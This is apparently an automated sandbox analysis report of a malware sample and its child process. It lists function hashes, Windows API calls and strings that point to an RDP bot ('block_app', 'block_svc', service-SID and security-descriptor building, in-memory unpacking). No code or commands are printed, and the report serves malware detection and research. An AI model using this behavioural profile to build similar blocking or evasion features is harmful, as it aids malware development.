Instruction Fuzzy Hash: F551233271CE0C8F9B1CDE2CE49867573D2F7AC324315826EE40ED7265DA30E9468781

Function 02B960DA Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction ID: 6729a28df03e5cd8237fb797bea448d2f693aa47e71d6067e110553b00606bf7
Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction Fuzzy Hash: 5321C8317116054BE70CCE2EC899975B3D6F7D9205B54D27DE14BCB357CD3258038A08

Function 02B95B4A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction ID: e1168f6ba9dfd52a8d0c6dd8589bd6800901c4e697313f84ea3a41aff8d5b0d9
Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction Fuzzy Hash: 0C11A1723118048FDB5CDF3DC99966973D6EB89304B58C2BDE51ACB26AD6358903C744

Function 02BA0D72 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02BA0DCF

Part of subcall function 02BA3132: __GetUnwindTryBlock.LIBCMT ref: 02BA3175
Part of subcall function 02BA3132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02BA319A

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02BA0EA7
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02BA10F5
std::bad_alloc::bad_alloc.LIBCMT ref: 02BA1202

Strings

csm, xrefs: 02BA0DE9
csm, xrefs: 02BA0E50
csm, xrefs: 02BA0ECA

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
Instruction ID: fda78d837835fa698d31ce9d126c84079128838e13a6126ace0fc2940beba94e
Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
Instruction Fuzzy Hash: 5FE1E13092CB488FDB64EF6CC4957A9B7E1FB99314F50069ED889D7251DB30E881CB82

Function 02BA1242 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02BA13E0
std::bad_alloc::bad_alloc.LIBCMT ref: 02BA1709

Strings

csm, xrefs: 02BA1407
csm, xrefs: 02BA1389
csm, xrefs: 02BA1327

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
Instruction ID: 14046405b1e90aeebe1ce8a1860d4169b7cc4e8b43290357a8f8b1ea94ec610f
Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
Instruction Fuzzy Hash: DBE1D23052CB488FDB54EF2CC4956AA77E1FB59314F1446AED48ACB612DB30E486CF82

Function 02BA0642 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 02BA0765
__AdjustPointer.LIBCMT ref: 02BA07B0

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
Instruction ID: 4a885687abaaa3a33441caf7e33b0a63ec440ff4f33efc88afdf7717bf305ace
Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
Instruction Fuzzy Hash: A5C1CF3051DE1A8F9B29BF1C8064375B2E1FB98714F584AADC48AC7255EB30E881CB85

Function 02B9A41E Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

H, xrefs: 02B9A6BC
, xrefs: 02B9A67E
2, xrefs: 02B9A673
P!`, xrefs: 02B9A726
(, xrefs: 02B9A6D2
`, xrefs: 02B9A4BF

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID: $($2$H$P!`$`
API String ID: 0-2682688576
Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
Instruction ID: 8586c5044f1aacd400091cbe900c4af0c88373ec64613b55f493d9dd5d844d48
Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
Instruction Fuzzy Hash: A8C1E6B09187988FD7A4DF18C08879ABBE0FB99314F504A6ED8CDCB215DB705589CF46

Function 02BA19B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02BA1A71

Strings

MOC, xrefs: 02BA1A3A
RCC, xrefs: 02BA1A42

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
Instruction ID: 1a1b0625bab4df5a055cca187211f6c5a18edbe6ac775c262f74c786df30e57e
Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
Instruction Fuzzy Hash: CCA1C63092CB488FCB58EF6CC495AA9BBF1FB98314F14469EE44AC7111EB34E581CB81

Function 02BA007A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02BA00A5
_IsNonwritableInCurrentImage.LIBCMT ref: 02BA013C

Strings

csm, xrefs: 02BA0123

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
Instruction ID: 53fc123febeac578d1632fbcec69fd8c90a36bc60fdf26bf36d50c5b997b39d3
Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
Instruction Fuzzy Hash: D561B23060CB088BDF28FE5CD4A5BB973D1FB54354F1049ADE88AC7256EB70E8918B85

Function 02BA1746 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02BA17F1

Strings

MOC, xrefs: 02BA17B9
RCC, xrefs: 02BA17C1

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
Instruction ID: a65801eec4a795febb14a72bb9d78bb8f0da6e77f8ac483e65b906d70e3bfe02
Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
Instruction Fuzzy Hash: 3371913052CB488FDB68EF1CC4567AAB7E0FB99314F444A9EE58DC3111DB74A582CB82

Function 02BA2806 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02BA28B0
_CreateFrameInfo.LIBVCRUNTIME ref: 02BA28D9

Strings

csm, xrefs: 02BA29D9

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction ID: 9687eae270c8af2f70304e3718173a3415f556e5bc77c427b5400c99a43d0dbe
Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction Fuzzy Hash: 835165B051CB449FD764EF28C49576A77E2FB89351F1009ADE58AC7621DB30E452CF82

Analysis Process: file.exePID: 5356, Parent PID: 560COMMON

Execution Graph

Execution Coverage:	59.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 027001B0 Relevance: 9.3, APIs: 6, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02700215
VirtualProtect.KERNELBASE ref: 02700301
VirtualFree.KERNELBASE ref: 02700332
VirtualFree.KERNELBASE ref: 02700358
VirtualAlloc.KERNELBASE ref: 0270037B
VirtualProtect.KERNELBASE ref: 0270051B

Memory Dump Source

Source File: 00000001.00000002.3366011655.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2700000_file.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction ID: 58042427141154d1acbfac9bc0f169e69cc8c7e061abe2e50d3cfe263cb03176
Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction Fuzzy Hash: 2FC1C830218A48CFD784EF5CC498B6AB7E1FB98315F51485DF48AC72A1DBB4E885CB06

Function 02700620 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0270063A

Memory Dump Source

Source File: 00000001.00000002.3366011655.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2700000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

Analysis Process: f8ff311483bvmdq2bvv.exePID: 5772, Parent PID: 5356COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8%
Total number of Nodes:	1691
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF66EBA855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66EBA9BB9: strcmp.MSVCRT ref: 00007FF66EBA9CAD

Process32Next.KERNEL32 ref: 00007FF66EBA8671
GetLastError.KERNEL32 ref: 00007FF66EBA867D
GetLastError.KERNEL32 ref: 00007FF66EBA86C1
GetLastError.KERNEL32 ref: 00007FF66EBA87A3
OpenProcess.KERNEL32 ref: 00007FF66EBA88DC
QueryFullProcessImageNameW.KERNEL32 ref: 00007FF66EBA8920
GetLastError.KERNEL32 ref: 00007FF66EBA892E
CloseHandle.KERNEL32 ref: 00007FF66EBA8CA8

Strings

block_app, xrefs: 00007FF66EBA868D, 00007FF66EBA86CC, 00007FF66EBA87B7, 00007FF66EBA8939, 00007FF66EBA8A2B, 00007FF66EBA8A88
[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d), xrefs: 00007FF66EBA8A32
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA8694
app, xrefs: 00007FF66EBA858D
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF66EBA87BE
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF66EBA86D3
[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu), xrefs: 00007FF66EBA8A8F
[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu), xrefs: 00007FF66EBA8940

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
API String ID: 1025937399-1899507746
Opcode ID: 1e170d9b8120a81f70631a2a1f41cb1946ebee46b206d7debbcd2553183d70b0
Instruction ID: 36ccc4f542328b7857f90b4936bd55d84837bcca87f1d21d85f833c2dd30da49
Opcode Fuzzy Hash: 1e170d9b8120a81f70631a2a1f41cb1946ebee46b206d7debbcd2553183d70b0
Instruction Fuzzy Hash: F1F12721E8D683D3FE71565CA6D83B81271EB6E354F104032E60ECFAD5DE6DA884874E

Function 00007FF66EBA97F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF66EBA983D
HeapFree.KERNEL32 ref: 00007FF66EBA984E

Part of subcall function 00007FF66EBA45D5: fopen.MSVCRT ref: 00007FF66EBA461A
Part of subcall function 00007FF66EBA45D5: fseek.MSVCRT ref: 00007FF66EBA4639
Part of subcall function 00007FF66EBA45D5: _errno.MSVCRT ref: 00007FF66EBA464D
Part of subcall function 00007FF66EBA45D5: _errno.MSVCRT ref: 00007FF66EBA4668

GetProcessHeap.KERNEL32 ref: 00007FF66EBA997A
HeapAlloc.KERNEL32 ref: 00007FF66EBA998B
strncpy.MSVCRT ref: 00007FF66EBA9ACC
strncpy.MSVCRT ref: 00007FF66EBA9AE3
strncpy.MSVCRT ref: 00007FF66EBA9B42

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Strings

(path != NULL), xrefs: 00007FF66EBA98B4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA98C2
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBA99DA
5, xrefs: 00007FF66EBA98A5
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA9886
NULL, xrefs: 00007FF66EBA9B92
ini_load, xrefs: 00007FF66EBA987F, 00007FF66EBA98BB, 00007FF66EBA9BA1
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF66EBA98AD
[I] (%s) -> Done(path=%s), xrefs: 00007FF66EBA9BA8
mem_alloc, xrefs: 00007FF66EBA99D3

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: 6bdd63fdaf4eb0f64baa3012e1c2c8aef03f561c3c6513481c65ebd5e865db8a
Instruction ID: faa828ce6d5de51a124fec594cc39ddae18ea977db19cf5bb6e040726d869c2e
Opcode Fuzzy Hash: 6bdd63fdaf4eb0f64baa3012e1c2c8aef03f561c3c6513481c65ebd5e865db8a
Instruction Fuzzy Hash: B3A1E261A4D686D2EF208B09F6807B92771EF6A784F484032FA4DCF695DE2EE545D308

Function 00007FF66EBA1131 Relevance: 13.6, APIs: 9, Instructions: 120
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF66EBA1313), ref: 00007FF66EBA116E
_amsg_exit.MSVCRT(?,?,?,00007FF66EBA1313), ref: 00007FF66EBA118D
_initterm.MSVCRT ref: 00007FF66EBA11AE
_initterm.MSVCRT ref: 00007FF66EBA11D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF66EBA1212
malloc.MSVCRT ref: 00007FF66EBA1244
strlen.MSVCRT ref: 00007FF66EBA125C
malloc.MSVCRT ref: 00007FF66EBA1268
_cexit.MSVCRT(?,?,?,00007FF66EBA1313), ref: 00007FF66EBA12E3

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction ID: 805b530bb25981f38050c46b51007c8da4c34e5c14b3c8cb900179b2860086bc
Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction Fuzzy Hash: DB514E65E48A07C6EFA19B15DA9127923B0EF2EB84F484035E90DCF395DE3CE8448758

Function 00007FF66EBA45D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF66EBA461A
fseek.MSVCRT ref: 00007FF66EBA4639
_errno.MSVCRT ref: 00007FF66EBA464D
_errno.MSVCRT ref: 00007FF66EBA4668
_errno.MSVCRT ref: 00007FF66EBA4727

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

_errno.MSVCRT ref: 00007FF66EBA4742
_errno.MSVCRT ref: 00007FF66EBA478F
fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4655, 00007FF66EBA469D, 00007FF66EBA46D0, 00007FF66EBA4703, 00007FF66EBA472F, 00007FF66EBA483A, 00007FF66EBA4950, 00007FF66EBA4A1B, 00007FF66EBA4ADA, 00007FF66EBA4B65, 00007FF66EBA4BA8
(buf_sz != NULL), xrefs: 00007FF66EBA46C9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA46A4, 00007FF66EBA46D7, 00007FF66EBA470A
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF66EBA465C
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF66EBA4736
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBA49FB
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C
NULL, xrefs: 00007FF66EBA4B99
(path != NULL), xrefs: 00007FF66EBA4696
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF66EBA4957
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF66EBA4841
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF66EBA4BAF
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF66EBA4A22
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF66EBA4AE1
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA468F, 00007FF66EBA46C2, 00007FF66EBA46F5
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF66EBA46FC
mem_alloc, xrefs: 00007FF66EBA49F4

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 476736063a4b9eb5de203d0d505906ad81cf16e2f6ac8535f0a535e5f2e4fb25
Instruction ID: 125e81b759b6bb18520e1de5a53be00d3cf0d17137e4ca15d7b53e13c872f40d
Opcode Fuzzy Hash: 476736063a4b9eb5de203d0d505906ad81cf16e2f6ac8535f0a535e5f2e4fb25
Instruction Fuzzy Hash: D8D19F21E48603D3EA209B59EA843B83371EF7A785F554132F90DCF2A4DE7CE9468308

Function 00007FF66EBA8CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF66EBA9BB9: strcmp.MSVCRT ref: 00007FF66EBA9CAD

Part of subcall function 00007FF66EBA1CF4: LoadLibraryA.KERNEL32 ref: 00007FF66EBA1D02

FreeLibrary.KERNEL32 ref: 00007FF66EBA8DAC

Part of subcall function 00007FF66EBA1C73: GetProcAddress.KERNEL32 ref: 00007FF66EBA1C93

strlen.MSVCRT ref: 00007FF66EBA8EEF
GetProcessHeap.KERNEL32 ref: 00007FF66EBA8F6B
HeapAlloc.KERNEL32 ref: 00007FF66EBA8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF66EBA9010

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF66EBA905D
GetProcessHeap.KERNEL32 ref: 00007FF66EBA90F2
HeapFree.KERNEL32 ref: 00007FF66EBA9103
LocalFree.KERNEL32 ref: 00007FF66EBA91E4

Part of subcall function 00007FF66EBA14E2: EnterCriticalSection.KERNEL32 ref: 00007FF66EBA15B3
Part of subcall function 00007FF66EBA14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF66EBA15DB
Part of subcall function 00007FF66EBA14E2: CopyFileA.KERNEL32 ref: 00007FF66EBA1638

Strings

[E] (%s) -> RtlCreateServiceSid failed(res=%08lx), xrefs: 00007FF66EBA8E52, 00007FF66EBA90D3
RtlZeroMemory, xrefs: 00007FF66EBA8DF1
svc, xrefs: 00007FF66EBA8D2C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBA90B3
ntdll.dll, xrefs: 00007FF66EBA8D5F
RtlCopyMemory, xrefs: 00007FF66EBA8E09
[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx), xrefs: 00007FF66EBA8E38
RtlFreeUnicodeString, xrefs: 00007FF66EBA8DD4
mem_alloc, xrefs: 00007FF66EBA90AC
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF66EBA9077
RtlCreateServiceSid, xrefs: 00007FF66EBA8DB7
RtlAnsiStringToUnicodeString, xrefs: 00007FF66EBA8D73
block_svc, xrefs: 00007FF66EBA8E31, 00007FF66EBA8E4B, 00007FF66EBA9070, 00007FF66EBA90CC, 00007FF66EBA91F2
